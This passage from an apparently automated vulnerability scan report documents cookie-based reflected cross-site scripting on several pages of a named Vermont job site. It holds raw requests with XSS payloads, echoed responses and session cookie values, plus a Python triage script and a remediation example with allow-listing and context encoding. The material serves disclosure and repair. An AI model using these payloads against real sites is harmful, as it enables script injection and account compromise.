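    '<?xml version="1.0" encoding="utf-8"?> '
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> '
    '<html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... '
    '<!DOCTYPE HTML PUBLIC \\"-//W3C//DTD HTML 4.01 Transitional//EN'
    '6EC58";ALERT(1)//809999D932E\\"> ...[SNIP]...'
)
# Constructed hardened variant: the same attribute sink after HTML-attribute encoding.
ATTR_BODY_ENCODED = ATTR_BODY.replace(
    '"><img src=a onerror=alert(1)>', "&quot;&gt;&lt;img src=a onerror=alert(1)&gt;"
)


@dataclass(frozen=True)
class Reflection:
    context: str            # "attribute", "js_string" or "unknown"
    echoed: str             # what came back between the two canaries
    case_preserved: bool    # echoed == payload, byte for byte
    case_folded: bool       # same text, but the application changed its case
    quote_intact: bool      # a raw, unescaped " survived
    angle_intact: bool      # raw < and > survived (matters for tag injection)
    executes_as_sent: bool  # conservative verdict: would this exact PoC run?


def classify_context(before: str) -> str:
    """Guess the syntactic context at the reflection point from the text before it."""
    last_lt, last_gt = before.rfind("<"), before.rfind(">")
    if last_lt > last_gt:  # a tag opener is still open
        fragment = before[last_lt:]
        if re.search(r'\s[\w:-]+="[^"]*$', fragment):
            return "attribute"  # inside name="... with the closing " still to come
    if '\\"' in before[-200:]:
        return "js_string"  # backslash-escaped quotes only occur inside a JS string literal
    return "unknown"


def find_reflection(body: str, prefix: str, payload: str, suffix: str) -> Optional[Reflection]:
    """Locate whatever sits between the scanner's random prefix and suffix canaries.

    The search is case-insensitive on purpose: the script-context responses in this
    report show the cookie value written back in upper case."""
    pat = re.compile(re.escape(prefix) + r"(.*?)" + re.escape(suffix), re.IGNORECASE | re.DOTALL)
    m = pat.search(body)
    if m is None:
        return None
    echoed = m.group(1)
    context = classify_context(body[: m.start()])
    case_preserved = echoed == payload
    case_folded = (not case_preserved) and echoed.lower() == payload.lower()
    quote_intact = re.search(r'(?<!\\)"', echoed) is not None
    angle_intact = "<" in echoed and ">" in echoed
    if context == "attribute":
        # Must close the attribute and the tag; the handler body is JavaScript, so case must survive.
        executes = quote_intact and angle_intact and case_preserved
    elif context == "js_string":
        # Must close the literal; the code that follows is case-sensitive.
        executes = quote_intact and case_preserved
    else:
        executes = False
    return Reflection(context, echoed, case_preserved, case_folded, quote_intact, angle_intact, executes)


def triage(body: str, prefix: str, payload: str, suffix: str) -> str:
    """One-line verdict for a finding, in the terms this report uses."""
    r = find_reflection(body, prefix, payload, suffix)
    if r is None:
        return "not reflected between the canaries"
    if r.executes_as_sent:
        return f"{r.context}: proof of concept executes as sent"
    if r.case_folded and r.quote_intact:
        return f"{r.context}: breakout confirmed, but value is case-folded so alert() will not resolve"
    return f"{r.context}: breakout characters were encoded or filtered"


if __name__ == "__main__":
    print(triage(ATTR_BODY, "e0fe3", '"><img src=a onerror=alert(1)>', "116f633914f"))
    print(triage(JS_BODY, "6ec58", '";alert(1)//', "809999d932e"))
    print(triage(ATTR_BODY_ENCODED, "e0fe3", '"><img src=a onerror=alert(1)>', "116f633914f"))
```

Run against the page's own snippets, the attribute reflection comes back as executing as sent, the script-string one as a confirmed breakout whose alert() will not resolve because of the case folding, and the encoded variant as filtered. The same three calls are what to re-run, with fresh canaries, against each of the paths listed in this report after the fix is deployed.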
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload a7915"%3balert(1)//5a2f3f874b0 was submitted in the SYSTRANLANGUAGE cookie and came back, converted to upper case, as A7915";ALERT(1)//5A2F3F874B0 in the application's response.
The unencoded " and // confirm that the string literal can be terminated and the rest of the statement commented out. Note, however, that the value is echoed in upper case: JavaScript identifiers are case-sensitive, so ALERT(1) does not resolve to alert and this exact proof of concept would raise a ReferenceError rather than execute. Confirming execution in this context needs a payload that survives being upper-cased.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ena7915"%3balert(1)//5a2f3f874b0; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA7915";ALERT(1)//5A2F3F874B0\">
...[SNIP]...
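Added example, not the site's ColdFusion code, illustrating the remediation advice given for the script-context instances above and the attribute-context instances alongside them. It reconstructs in Python the two sinks this report shows, the raw cookie inside xml:lang="..." and the upper-cased copy inside a JavaScript string literal, beside a fixed version that validates the language against an allow-list and encodes each sink for its own context. The document.write() wrapper around the second sink is an assumption (the responses show only the backslash-escaped quotes of a string literal); the allow-list pattern and the default of en are mine. The tag collector at the end uses the standard library's HTML parser to show that the injected <img> and its onerror handler appear in the vulnerable output and not in the fixed one.

```python
import html
import re
from html.parser import HTMLParser
from typing import List, Tuple

# Allow-list for the language selector: a 2-3 letter language code with an
# optional region subtag (en, fr, en-US, pt-BR). The pattern and the default
# are assumptions; widen them to the locales the site actually supports.
LANGUAGE_TAG = re.compile(r"[a-z]{2,3}(?:-[A-Za-z]{2,4})?")


def normalise_language(cookie_value: str, default: str = "en") -> str:
    """Validate the SYSTRANLANGUAGE cookie before it is used anywhere."""
    value = cookie_value.strip()
    return value if LANGUAGE_TAG.fullmatch(value) else default


def encode_html_attribute(value: str) -> str:
    """For a value placed inside a double-quoted HTML attribute."""
    return html.escape(value, quote=True)  # & < > " ' become entities


def encode_js_string(value: str) -> str:
    """For a value placed inside a JavaScript string literal: everything outside
    [A-Za-z0-9] becomes \\xHH or \\uHHHH, so the value can never close the
    literal, open a comment, or form a </script> end tag."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def render_vulnerable(cookie_value: str) -> str:
    """The two sinks this report shows: the raw cookie in xml:lang="..." and,
    upper-cased, inside a JavaScript string literal. The document.write()
    wrapper is an assumption; the responses show only the escaped quotes."""
    return (
        f'<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="{cookie_value}">\n'
        f'<script>document.write("<!DOCTYPE HTML PUBLIC \\"-//W3C//DTD HTML 4.01 '
        f'Transitional//{cookie_value.upper()}\\">");</script>'
    )


def render_fixed(cookie_value: str) -> str:
    """Same sinks: allow-list first, then encode each sink for its own context."""
    lang = normalise_language(cookie_value)
    return (
        f'<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="{encode_html_attribute(lang)}">\n'
        f'<script>document.write("<!DOCTYPE HTML PUBLIC \\"-//W3C//DTD HTML 4.01 '
        f'Transitional//{encode_js_string(lang.upper())}\\">");</script>'
    )


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute a browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.handlers: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def injected_elements(markup: str) -> Tuple[List[str], List[str]]:
    """(tag names, event-handler attribute names) found by a real HTML parser."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.handlers


if __name__ == "__main__":
    payload = 'ene0fe3"><img src=a onerror=alert(1)>116f633914f'  # from the report
    print(injected_elements(render_vulnerable(payload)))  # (['html', 'img', 'script'], ['onerror'])
    print(injected_elements(render_fixed(payload)))       # (['html', 'script'], [])
```

The allow-list is the fix that removes the problem at its source, since a language selector has no legitimate reason to contain quotes or angle brackets; the two encoders are defence in depth for the day someone reuses the value in a new template, and they are deliberately different because an attribute-encoded value is still a live breakout inside a JavaScript string and vice versa.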
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90722"><img%20src%3da%20onerror%3dalert(1)>d3b228eaffa was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 90722"><img src=a onerror=alert(1)>d3b228eaffa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en90722"><img%20src%3da%20onerror%3dalert(1)>d3b228eaffa; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:17 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en90722"><img src=a onerror=alert(1)>d3b228eaffa">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e38"><img%20src%3da%20onerror%3dalert(1)>49f032b2ef was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 60e38"><img src=a onerror=alert(1)>49f032b2ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en60e38"><img%20src%3da%20onerror%3dalert(1)>49f032b2ef; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en60e38"><img src=a onerror=alert(1)>49f032b2ef">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload b39ba"%3balert(1)//5d5454969d8 was submitted in the SYSTRANLANGUAGE cookie and came back, converted to upper case, as B39BA";ALERT(1)//5D5454969D8 in the application's response.
The unencoded " and // confirm that the string literal can be terminated and the rest of the statement commented out. Note, however, that the value is echoed in upper case: JavaScript identifiers are case-sensitive, so ALERT(1) does not resolve to alert and this exact proof of concept would raise a ReferenceError rather than execute. Confirming execution in this context needs a payload that survives being upper-cased.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb39ba"%3balert(1)//5d5454969d8; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB39BA";ALERT(1)//5D5454969D8\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac724"><img%20src%3da%20onerror%3dalert(1)>da9bad07b8d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ac724"><img src=a onerror=alert(1)>da9bad07b8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=enac724"><img%20src%3da%20onerror%3dalert(1)>da9bad07b8d; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enac724"><img src=a onerror=alert(1)>da9bad07b8d">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload 49afa"%3balert(1)//3811d504e1 was submitted in the SYSTRANLANGUAGE cookie and came back, converted to upper case, as 49AFA";ALERT(1)//3811D504E1 in the application's response.
The unencoded " and // confirm that the string literal can be terminated and the rest of the statement commented out. Note, however, that the value is echoed in upper case: JavaScript identifiers are case-sensitive, so ALERT(1) does not resolve to alert and this exact proof of concept would raise a ReferenceError rather than execute. Confirming execution in this context needs a payload that survives being upper-cased.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en49afa"%3balert(1)//3811d504e1; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:09 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN49AFA";ALERT(1)//3811D504E1\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload 5fb25"%3balert(1)//0afab1b910d was submitted in the SYSTRANLANGUAGE cookie and came back, converted to upper case, as 5FB25";ALERT(1)//0AFAB1B910D in the application's response.
The unencoded " and // confirm that the string literal can be terminated and the rest of the statement commented out. Note, however, that the value is echoed in upper case: JavaScript identifiers are case-sensitive, so ALERT(1) does not resolve to alert and this exact proof of concept would raise a ReferenceError rather than execute. Confirming execution in this context needs a payload that survives being upper-cased.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
